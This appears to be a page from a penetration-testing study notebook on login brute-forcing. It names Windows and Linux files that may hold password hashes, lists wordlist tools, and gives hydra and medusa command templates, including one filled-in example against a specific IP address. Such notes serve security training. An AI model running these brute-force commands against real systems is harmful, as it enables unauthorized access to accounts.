Login Bruteforcing

  • In Windows the following files might contain passwords hashes:

    • unattend.xml

    • sysprep.inf

    • SAM

  • In Linux the following files might contain passwords hashes:

    • shadow

    • shadow.bak

    • password

  • Since humans are generally lazy, it's a good idea to start by testing default credentials.

  • Tools like hydra and medusa can be used to do bruteforcing attacks.

  • Username Anarchy is a tool that can be used to create a customized username wordlist.

  • CUPP is a tool that can be used to create customized password wordlists.

  • grep command can be used after creating the custom wordlists to optimize them further based on the system's poilcies (i.e. minimum 6 characters or minimum 1 special character)

  • Commands:

#Command to bruteforce a basic http authentication form
#Since we have the -C flag, the wordlist should be in the format Username:Password
hydra -C <Credentials-Word-List> <Target-IP-Address> -s <Target-Port> http-get <Target-Path>

#Command for seperate wordlists for usernames and passwords.
#The flag -u is to try all the usernames with the same password instead of the opposite (All passwords for one user).
hydra -L <Username-Word-List> -P <Password-Word-List> -u -f <Target-IP-Address> -s <Target-Port> http-get <Target-Path>

#Uppercase -L and -P flags is to specify flags. If you want to specify only 1 value then use lowercase flags followed by the value.

#To find the supported services by Hydra
hydra -h | grep "Supported services" | tr ":" "\n" | tr " " "\n" | column -e

#To bruteforce a PHP/Other authentication form
hydra -C <Credentials-Word-List> <Target-IP-Address> -s <Target-Port> http-post-form "<Login-Page-URI>:<Username-Parameter-Name>=^USER^&<Password-Parameter-Name>=^PASS^:F=<Code-Only-Exist-In-Login-Page>"

#Example:
hydra -C /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 178.35.49.134 -s 32901 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

#Service Bruteforcing
hydra -L <Username-Word-List> -P <Password-Word-List> -u -f <Service-Name>://<Target-IP-Address>:<Target-Port> -t 4

#Medusa Command Template
medusa -M <Module-Name> -h <Target> -U <Username-Word-List> -P <Password-Word-List> -m <Optional-Module-Options>
PreviousAttacking Web Applications With Ffuf (Check)NextCross-Site Scripting (XSS)

Last updated